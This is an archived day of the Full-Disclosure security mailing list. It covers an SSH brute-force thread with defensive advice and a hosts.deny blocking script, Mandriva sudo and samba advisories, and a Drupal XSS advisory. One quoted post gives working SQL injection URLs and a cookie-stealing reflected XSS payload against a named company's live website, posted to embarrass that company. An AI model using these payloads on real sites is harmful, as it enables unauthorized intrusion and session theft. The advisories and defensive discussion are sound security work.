>> Both of these systems are within one /21 and get attacked
>> regularly. I run Denyhosts on them, and update the central server once
>> an hour with attacking IPs, and obviously also download the public
>> hosts.deny list.
>>
>> These machines get hit regularly, so often that I don't really
>> care, it's fun to make the script kiddies waste their time! But in
>> this instance, only my home box is being attacked... someone is
>> burning a lot of cycles and hosts to do a distributed dictionary
>> attack on my one box! The named daemon is non recursive, properly
>> configured, up to date and not being attacked.
>>
>> Is anyone else seeing this type of attack? Or is someone really
>> targeting MY box?
>>
>> Thanks
>>
>>
>> Gary Baribault
>> Courriel: g...@baribault.net
>> GPG Key: 0x685430d1
>> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Adam Richards 
I had an attacker go after one of my FreeBSD machines for almost two
months straight. I wrote my own denyhost (like) script and banned his
IP's constantly, but it didn't stop until he ran out of proxies I guess.
Either that or it was busy season for my ip block.



-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gary
Baribault
Sent: Thursday, June 17, 2010 6:48 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] targetted SSH bruteforce attacks

Hello list,

I have a strange situation and would like information from the
list members. I have three Linux boxes exposed to the Internet. Two of
them are on cable modems, and both have two services that are publicly
available. In both cases, I have SSH and named running and available
to the public. Before you folks say it, yes I run SSH on TCP/22 and no
I don't want to move it to another port, and no I don't want to
restrict it to certain source IPs.

Both of these systems are within one /21 and get attacked
regularly. I run Denyhosts on them, and update the central server once
an hour with attacking IPs, and obviously also download the public
hosts.deny list.

These machines get hit regularly, so often that I don't really
care, it's fun to make the script kiddies waste their time! But in
this instance, only my home box is being attacked... someone is
burning a lot of cycles and hosts to do a distributed dictionary
attack on my one box! The named daemon is non recursive, properly
configured, up to date and not being attacked.

Is anyone else seeing this type of attack? Or is someone really
targeting MY box?

Thanks


Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Drupal FileField Module XSS Vulnerability

2010-06-17 Thread Justin C. Klein Keane 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

FileField 6.x-3.3 Arbitrary Script Injection Vulnerability

CVE-2010-1958

Description of Vulnerability:
- -
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL.  The Drupal FileField module
(http://drupal.org/project/filefield) "provides a universal file upload
field for CCK. It is a robust alternative to core's Upload module and an
absolute must for users uploading a large number of files. Great for
managing video and audio files for podcasts on your own site."  The
FileField module contains a cross site scripting (XSS) vulnerability due
to the fact that it fails to sanitize image filenames before display.

Systems affected:
- -
Drupal 6.16 with CCK 6.x-2.6 and FileField 6.x-3.3 was tested and shown
to be vulnerable.

Impact
- --
Users who have rights to create content may upload files (including
images) with malicious names that could result in script execution.
This could result in administrative account compromise leading to web
server process compromise.

Mitigating factors:
- ---
Attacker must have rights to create content of a type that employs an
FileField CCK element.  This would include most content that had
attachments including imagery, documents, etc.

Additionally, Drupal's file handling must be set to Public in the File
system settings at ?q=admin/settings/file-system.  This is the default
configuration.

Further Details:
- 
Further details about this vulnerability can be found at
http://www.madirish.net/?article=461

Vendor Response:
- --
Vendor has responded by releasing a fixed version and a detailed
security announcement.  Vendor response is fully detailed in
SA-CONTRIB-2010-066 (http://drupal.org/node/829808)

- -- 
Justin C. Klein Keane
http://www.MadIrish.net

The digital signature on this message can be confirmed
using the public key at http://www.madirish.net/gpgkey
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/

iPwEAQECAAYFAkwaHF0ACgkQkSlsbLsN1gC1Nwb+PFlE/a/PtZJdjnI3IO18FzaV
nZkEfBlngdsHZLW+G9qoaXyORZ781uIkRtQJMEQBEKBFWAYfPAuvAk2eq7xxhoZl
X8zrKtJYb7gkWZO+7iBGs0q/ah7FKLCPr578SgMcilCLn7OmjkEFJOqRH0Fb2kVu
beiL3N5vEVI4Qz/qygglMvsFyRm4v22l8SeYKFrs/e7x+NR8puQjVvSeF5dFSQ7x
oqJrdPqD29fO3sfKVR/IqIGwFg+nzLUrvmqT4p7HSsxjbc5IXGRn+MohbRz/RS1C
rzqZI/ytPkuBp2XRqdI=
=EpO+
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2010:118 ] sudo

2010-06-17 Thread security 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:118
 http://www.mandriva.com/security/
 ___

 Package : sudo
 Date: June 17, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0,
   Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in sudo:
 
 The secure path feature in env.c in sudo 1.3.1 through 1.6.9p22 and
 1.7.0 through 1.7.2p6 does not properly handle an environment that
 contains multiple PATH variables, which might allow local users
 to gain privileges via a crafted value of the last PATH variable
 (CVE-2010-1646).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1646
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 3b150466a24f75af8f4bbcc89c1468d2  
2008.0/i586/sudo-1.6.9p5-1.4mdv2008.0.i586.rpm 
 49875dd9c6e6d839a61226b021cf192d  
2008.0/SRPMS/sudo-1.6.9p5-1.4mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 6d110f6c4ff43eff97f057be1706ca13  
2008.0/x86_64/sudo-1.6.9p5-1.4mdv2008.0.x86_64.rpm 
 49875dd9c6e6d839a61226b021cf192d  
2008.0/SRPMS/sudo-1.6.9p5-1.4mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 02649098037409edb33fd03e1b8b21cd  
2009.0/i586/sudo-1.6.9p17-1.5mdv2009.0.i586.rpm 
 3d0670af695d911acdbb5c5c3b9d342f  
2009.0/SRPMS/sudo-1.6.9p17-1.5mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 6c7c2b55e65b7054bbc3d46e3f55987b  
2009.0/x86_64/sudo-1.6.9p17-1.5mdv2009.0.x86_64.rpm 
 3d0670af695d911acdbb5c5c3b9d342f  
2009.0/SRPMS/sudo-1.6.9p17-1.5mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 e6e4ffb3c60b2aff91eb219c7a0bea00  2009.1/i586/sudo-1.7.0-1.5mdv2009.1.i586.rpm 
 667a2aedf07bfb872959137305a55ce9  2009.1/SRPMS/sudo-1.7.0-1.5mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 a4d32b781c15a3f9d9d125517926d331  
2009.1/x86_64/sudo-1.7.0-1.5mdv2009.1.x86_64.rpm 
 667a2aedf07bfb872959137305a55ce9  2009.1/SRPMS/sudo-1.7.0-1.5mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 c588b31daa6df95eac1ee60dc7dcf8ac  
2010.0/i586/sudo-1.7.2-0.p1.1.3mdv2010.0.i586.rpm 
 c6be126b2615e18e70078dd293d03de3  
2010.0/SRPMS/sudo-1.7.2-0.p1.1.3mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 8f4941c826a0bd548a61d9da7bb0e73e  
2010.0/x86_64/sudo-1.7.2-0.p1.1.3mdv2010.0.x86_64.rpm 
 c6be126b2615e18e70078dd293d03de3  
2010.0/SRPMS/sudo-1.7.2-0.p1.1.3mdv2010.0.src.rpm

 Corporate 4.0:
 44c695de05087df739f5e6c88478b4a4  
corporate/4.0/i586/sudo-1.6.8p8-2.6.20060mlcs4.i586.rpm 
 11cbff747ced6ba1a7a42b31bafea93c  
corporate/4.0/SRPMS/sudo-1.6.8p8-2.6.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 f4e89034ad77274fb8b1a3d8328a3b28  
corporate/4.0/x86_64/sudo-1.6.8p8-2.6.20060mlcs4.x86_64.rpm 
 11cbff747ced6ba1a7a42b31bafea93c  
corporate/4.0/SRPMS/sudo-1.6.8p8-2.6.20060mlcs4.src.rpm

 Mandriva Enterprise Server 5:
 4f681bc8038255e2847e003a81026c61  
mes5/i586/sudo-1.6.9p17-1.5mdvmes5.1.i586.rpm 
 1eb14f0e7241bd6e5b916775a6673491  mes5/SRPMS/sudo-1.6.9p17-1.5mdvmes5.1.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 60aedd6549ad7cd8f56c534b13f8e5eb  
mes5/x86_64/sudo-1.6.9p17-1.5mdvmes5.1.x86_64.rpm 
 1eb14f0e7241bd6e5b916775a6673491  mes5/SRPMS/sudo-1.6.9p17-1.5mdvmes5.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFMGe/hmqjQ0CJFipgRAogFAKDZ1mQU10QPHvxinipXR5eqa37wsQCbB95W
v4RrVtM1SUuLg3Ka1ZFva04=
=Ly7f
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Valdis . Kletnieks 
On Thu, 17 Jun 2010 07:48:18 EDT, Gary Baribault said:

> Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
> 
> These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box!

One of two things springs to mind:

1) when they scanned your address space looking for SSH hosts to try to
whack, your one host didn't report as a target for some random reason.

2) they're handling their list of targets in a pseudo-random order.  We've
seen attacking IPs pound on 2 or 3 hosts in our /16 for a few days, then go
away, and 2-3 weeks later return to pound on other targets.

Bottom line: Either they didn't notice your other box, or they'll get around
to poking it in a few weeks...



pgp3XjTWIiJ6n.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Michael Holstein 

> Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
>
>   

No, I assure you it's not just you.

It's also not uncommon to see a sequential (basically a nmap -p 22) scan
at full throttle several times a day.

You can basically :

a) move to another port (obscurity .. but pretty effective in weeding
out the casual versus committed)
b) switch to public key only auth (recommended anyway if possible).
c) use denyhosts, tarpitting, etc. to frustrate the casual guessers and
bots.

The ones that are committed will find a way around (a) and (c). But it
will take somebody a long time to properly guess a key for (b) .. 
unless you forgot to patch your Debian SSHd from their little snafu ..
but you'd have been owned long ago if that was the case.

If you really must use passwords on a multi-user system listening on
tcp/22, then employ something like the PAM modules for JTR
(/pam_passwdqc) /just to make sure people don't use stupid ones.

Cheers,

Michael Holstein
Cleveland State University

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] THQ website has multiple SQL injection bugs, and a reflected XSS

2010-06-17 Thread Benji 
rabble rabble rabble rabble rabble rabble rabble rabble rabble rabble
rabble rabble rabble rabble rabble rabble rabble rabble rabble rabble
rabble rabble rabble rabble rabble rabble rabble rabble rabble

On Wed, Jun 16, 2010 at 9:05 PM, Harry Balls  wrote:
> This is pretty much because I want to embarrass these assholes. See:
> http://gamepolitics.com/2010/06/14/exec-thq-anti-used-game-initiative-could-make-everyone-happy
>
> SQLi 1:
> http://www.thq.com/us/mythq/register?contentType=GAMEALERT&alertGame='4896
>
> This one is pretty obvious. It's an injection via $_GET. The funniest part
> is that they don't just allow injection. They serve up the whole PHP source
> of the page for you. Giving you table names, and the actual syntax of the
> query being used.
>
> SQLi 2:
> The next one is an injection via POST in their registration form here:
> http://www.thq.com/us/mythq/register
>
> I used burpsuite to inject it by editing the HTTP requests but you can
> probably just enter whatever you want right in the form. I used the UK
> subdomain for testing: http://uk.thq.com/uk/mythq/register. This one also
> shows the source.
>
> Next one is your typical reflected XSS:
>
> http://www.thq.com/us/search/index?keyw=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
>
> I hope this is enough to put off anyone who was thinking of buying shit from
> them.
> Would you trust this company with your credit card information when they
> can't even properly sanitize a registration form?
> These probably aren't even the only security bugs on their site. This is
> just after 10 minutes of pentesting. Do yourself a favor and stay far far
> away from this company. They have no clue about security and obviously don't
> give a shit about their customers.
>
> BOYCOTT THQ
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Benji 
What?

Think about what you said.

Anyone. else. seeing. a. targetted. attack.

Why would anyone else see a TARGETTED attack?

anyway, no, you're not special, distributed SSH bruteforce is normal.


On Thu, Jun 17, 2010 at 1:44 PM, Gary Baribault  wrote:
> I just knew that people would say that, and that's why I specified
> that I WANT to keep SSH on 22 .. it's fun to see the attacks, and it's
> interesting to see new types of attacks. The question here is whether
> anyone else is seeing such a targeted attack.
>
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
>
> On 06/17/2010 08:28 AM, d...@mrhinkydink.com wrote:
>>
>> Have you ever considered obfuscated-openssh?
>>
>> http://github.com/brl/obfuscated-openssh
>>
>> I have a modified version of PuTTY available for it...
>>
>> http://www.mrhinkydink.com/potty.htm
>>
>> Still... you should change the freakin' port.
>>
>>  Original Message  Subject: [Full-disclosure]
>> targetted SSH bruteforce attacks From: Gary Baribault
>>  Date: Thu, June 17, 2010 7:48 am To:
>> full-disclosure@lists.grok.org.uk
>>
>> Hello list,
>>
>> I have a strange situation and would like information from the list
>> members. I have three Linux boxes exposed to the Internet. Two of
>> them are on cable modems, and both have two services that are
>> publicly available. In both cases, I have SSH and named running and
>> available to the public. Before you folks say it, yes I run SSH on
>> TCP/22 and no I don't want to move it to another port, and no I
>> don't want to restrict it to certain source IPs.
>>
>> Both of these systems are within one /21 and get attacked
>> regularly. I run Denyhosts on them, and update the central server
>> once an hour with attacking IPs, and obviously also download the
>> public hosts.deny list.
>>
>> These machines get hit regularly, so often that I don't really
>> care, it's fun to make the script kiddies waste their time! But in
>> this instance, only my home box is being attacked... someone is
>> burning a lot of cycles and hosts to do a distributed dictionary
>> attack on my one box! The named daemon is non recursive, properly
>> configured, up to date and not being attacked.
>>
>> Is anyone else seeing this type of attack? Or is someone really
>> targeting MY box?
>>
>> Thanks
>>
>>
>> Gary Baribault Courriel: g...@baribault.net GPG Key: 0x685430d1
>> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>>
>> ___ Full-Disclosure -
>> We believe in it. Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>> sponsored by Secunia - http://secunia.com/
>>
>> ___ Full-Disclosure -
>> We believe in it. Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>> sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Frank Bures 
Gary Baribault wrote:
> I just knew that people would say that, and that's why I specified
> that I WANT to keep SSH on 22 .. it's fun to see the attacks, and it's
> interesting to see new types of attacks. The question here is whether
> anyone else is seeing such a targeted attack.

I've seen an interesting SSH attack in the last couple of days on our /22
network.  Instead of probing port 22 on many machines in the shortest
possible time period as usual, this attack seems to be trying to be
stealthy.  It never attacks more than 4 machines in an hour and never twice
from the same IP address.  As all attacking addresses are subsequently
blocked, I wonder how long is it going to take for the guy(s) to run out of
available addresses at this rate :-)

Cheers
Frank



-- 



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gregory Bellier 
Hi !

Most of the time (to not say everytime), it's a bot and not a human behind
those attacks.
I configured my firewall to ban for a minute every IPs trying to log in with
5 wrong attempts.
Once it's banned, the bot tries one or two more times and then give up.

It's pretty much effective.



2010/6/17 Gary Baribault 

> Hello list,
>
>I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.
>
>Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
>
>These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
>
>Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
>
> Thanks
>
>
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Samuel Martín Moro 
I also don't want to change my ssh port, nor restrict incoming IPs, ... and
I use keys only to log in without entering password.
So you're not alone.
I had my IP changed several times, my servers are only hosting personal
data.
But I'm still seeing bruteforce attemps in my logs.

Here's something I use on my servers.
In cron, every 5-10 minutes, that should do it.
Of course, if you're running *BSD, pf is way more interesting to do that.


---

#!/bin/sh

AUTH=/var/log/auth.log
BKLST=/var/log/blacklist.log
HOSTS=/etc/hosts
DHOSTS=/etc/hosts.deny
LOCAL_IP=_your_ip_

cat $AUTH | egrep -i "(failed|illegal|invalid)" | awk -F "from" '{ print $2
}' | awk '{ print $1 }' | sort -u >$BKLST

for i in `cat $BKLST`
do
test `cat $AUTH | egrep -i "(failed|illegal|invalid)" | grep $i | wc
-l` -ge 3 || continue
test "`echo $i | grep $LOCAL_IP`" && continue
test "`cat $HOSTS | grep $i`" && continue
test "`cat $DHOSTS | grep $i`" && continue
echo "ALL : $i  # matched on `date`" >>$DHOSTS
done

---

Samuel Martín Moro
{EPITECH.} tek4
CamTrace S.A.S

"Nobody wants to say how this works.
 Maybe nobody knows ..."
 Xorg.conf(5)


On Thu, Jun 17, 2010 at 1:48 PM, Gary Baribault  wrote:

> Hello list,
>
>I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.
>
>Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
>
>These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
>
>Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
>
> Thanks
>
>
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault 
On this system, there is only one user allowed, and that's me. On one
of my other systems, where two, but both good security guys. I run a
bash script every night to grep the successful and unsuccessful logins
every night that is mailed to me, that's how I spot these things
quick. Also Denyhosts emails me for every Deny.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1


On 06/17/2010 10:56 AM, Michael Holstein wrote:
>
>> Is anyone else seeing this type of attack? Or is someone really
>> targeting MY box?
>>
>>  
>
> No, I assure you it's not just you.
>
> It's also not uncommon to see a sequential (basically a nmap -p 22) scan
> at full throttle several times a day.
>
> You can basically :
>
> a) move to another port (obscurity .. but pretty effective in weeding
> out the casual versus committed)
> b) switch to public key only auth (recommended anyway if possible).
> c) use denyhosts, tarpitting, etc. to frustrate the casual guessers and
> bots.
>
> The ones that are committed will find a way around (a) and (c). But it
> will take somebody a long time to properly guess a key for (b) ..
> unless you forgot to patch your Debian SSHd from their little snafu ..
> but you'd have been owned long ago if that was the case.
>
> If you really must use passwords on a multi-user system listening on
> tcp/22, then employ something like the PAM modules for JTR
> (/pam_passwdqc) /just to make sure people don't use stupid ones.
>
> Cheers,
>
> Michael Holstein
> Cleveland State University
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2010:119 ] samba

2010-06-17 Thread security 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:119
 http://www.mandriva.com/security/
 ___

 Package : samba
 Date: June 17, 2010
 Affected: 2008.0, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in samba:
 
 Samba versions 3.0.x, 3.2.x and 3.3.x are affected by a memory
 corruption vulnerability. Code dealing with the chaining of SMB1
 packets did not correctly validate an input field provided by the
 client, making it possible for a specially crafted packet to crash
 the server or potentially cause the server to execute arbitrary code
 (CVE-2010-2063).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 a67b12f9b389badf7b0aa3d3051bfa84  
2008.0/i586/libsmbclient0-3.0.37-0.4mdv2008.0.i586.rpm
 c7efb3df76e8787d446e2e89f32e0788  
2008.0/i586/libsmbclient0-devel-3.0.37-0.4mdv2008.0.i586.rpm
 242adc8ea68149bfb355044a9284e359  
2008.0/i586/libsmbclient0-static-devel-3.0.37-0.4mdv2008.0.i586.rpm
 58878d10f339175a362f15c4edc058c5  
2008.0/i586/mount-cifs-3.0.37-0.4mdv2008.0.i586.rpm
 b09533c807559a06c0c5463ac709f6f3  
2008.0/i586/nss_wins-3.0.37-0.4mdv2008.0.i586.rpm
 080fc1b95319564e9f81f8d30bc2c6a7  
2008.0/i586/samba-client-3.0.37-0.4mdv2008.0.i586.rpm
 814ed3e299433390d248a5cdd3e2ecd0  
2008.0/i586/samba-common-3.0.37-0.4mdv2008.0.i586.rpm
 fc4a5b969ef2c9eb6f1bce1946992b60  
2008.0/i586/samba-doc-3.0.37-0.4mdv2008.0.i586.rpm
 990160cc240b70b9c78c449030700571  
2008.0/i586/samba-server-3.0.37-0.4mdv2008.0.i586.rpm
 476a7671df375818923a8d3926b83b12  
2008.0/i586/samba-swat-3.0.37-0.4mdv2008.0.i586.rpm
 deac94c8be00158637af68f75523c4e1  
2008.0/i586/samba-vscan-icap-3.0.37-0.4mdv2008.0.i586.rpm
 39bfefe0074e88d3519b9a2b17dc972b  
2008.0/i586/samba-winbind-3.0.37-0.4mdv2008.0.i586.rpm 
 a180848342054c9fcca897aa705e  
2008.0/SRPMS/samba-3.0.37-0.4mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 6f91be90bdbec6915c3a6ef551d9554d  
2008.0/x86_64/lib64smbclient0-3.0.37-0.4mdv2008.0.x86_64.rpm
 f0c8c5ed89a081490de47e0620dfe21f  
2008.0/x86_64/lib64smbclient0-devel-3.0.37-0.4mdv2008.0.x86_64.rpm
 f8ffe0766f66fb27089069e0fed7e985  
2008.0/x86_64/lib64smbclient0-static-devel-3.0.37-0.4mdv2008.0.x86_64.rpm
 6a2b184259c1752c9d2316a6b38c5e04  
2008.0/x86_64/mount-cifs-3.0.37-0.4mdv2008.0.x86_64.rpm
 598345527f4b0359a3296e3ce4f717fb  
2008.0/x86_64/nss_wins-3.0.37-0.4mdv2008.0.x86_64.rpm
 3e19f852dad61d46304a1d4f4c2a9dcc  
2008.0/x86_64/samba-client-3.0.37-0.4mdv2008.0.x86_64.rpm
 40c4fab42efdedb92e2f638614802738  
2008.0/x86_64/samba-common-3.0.37-0.4mdv2008.0.x86_64.rpm
 29bcda428cb08985155f68907560dd3c  
2008.0/x86_64/samba-doc-3.0.37-0.4mdv2008.0.x86_64.rpm
 657e29fe549f0f27f4fe77f5df042b6f  
2008.0/x86_64/samba-server-3.0.37-0.4mdv2008.0.x86_64.rpm
 11cf0cfc25b454126bc1e7fd857bc35a  
2008.0/x86_64/samba-swat-3.0.37-0.4mdv2008.0.x86_64.rpm
 d0f2a65d17be218b22f056838499725e  
2008.0/x86_64/samba-vscan-icap-3.0.37-0.4mdv2008.0.x86_64.rpm
 77fcbc3b05869081af23be75f8909851  
2008.0/x86_64/samba-winbind-3.0.37-0.4mdv2008.0.x86_64.rpm 
 a180848342054c9fcca897aa705e  
2008.0/SRPMS/samba-3.0.37-0.4mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 8aa4e47d93beba9c62a665385b840e52  
2009.0/i586/libnetapi0-3.3.12-0.3mdv2009.0.i586.rpm
 11092927d2c0bdca21e56da366a23a1b  
2009.0/i586/libnetapi-devel-3.3.12-0.3mdv2009.0.i586.rpm
 ff2ab62b297ef1e7d5657433b3a290c5  
2009.0/i586/libsmbclient0-3.3.12-0.3mdv2009.0.i586.rpm
 f462b6ae0b8e9e2d2c0c98311c4ee117  
2009.0/i586/libsmbclient0-devel-3.3.12-0.3mdv2009.0.i586.rpm
 b67354d7363860d3c0d3a9ba098da407  
2009.0/i586/libsmbclient0-static-devel-3.3.12-0.3mdv2009.0.i586.rpm
 3ad7113c1663f640214f1fb0b4ca3815  
2009.0/i586/libsmbsharemodes0-3.3.12-0.3mdv2009.0.i586.rpm
 dafe0b64b181143d9e280859eea6f20b  
2009.0/i586/libsmbsharemodes-devel-3.3.12-0.3mdv2009.0.i586.rpm
 2e46480abff44ae27f790b03144295d2  
2009.0/i586/libtalloc1-3.3.12-0.3mdv2009.0.i586.rpm
 922f2ad91ff59a19afc83ace0bf34bd9  
2009.0/i586/libtalloc-devel-3.3.12-0.3mdv2009.0.i586.rpm
 32e5364faad127db6ad1b6ef948d80f1  
2009.0/i586/libtdb1-3.3.12-0.3mdv2009.0.i586.rpm
 6b94d68f8271b94063f7c3646c51e2ef  
2009.0/i586/libtdb-devel-3.3.12-0.3mdv2009.0.i586.rpm
 bd58c875f5e2ae8dee734036e0c86f69  
2009.0/i586/libwbclien

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Bipin Gautam 
Try port knocking + shh and rest of the above suggestions?

___
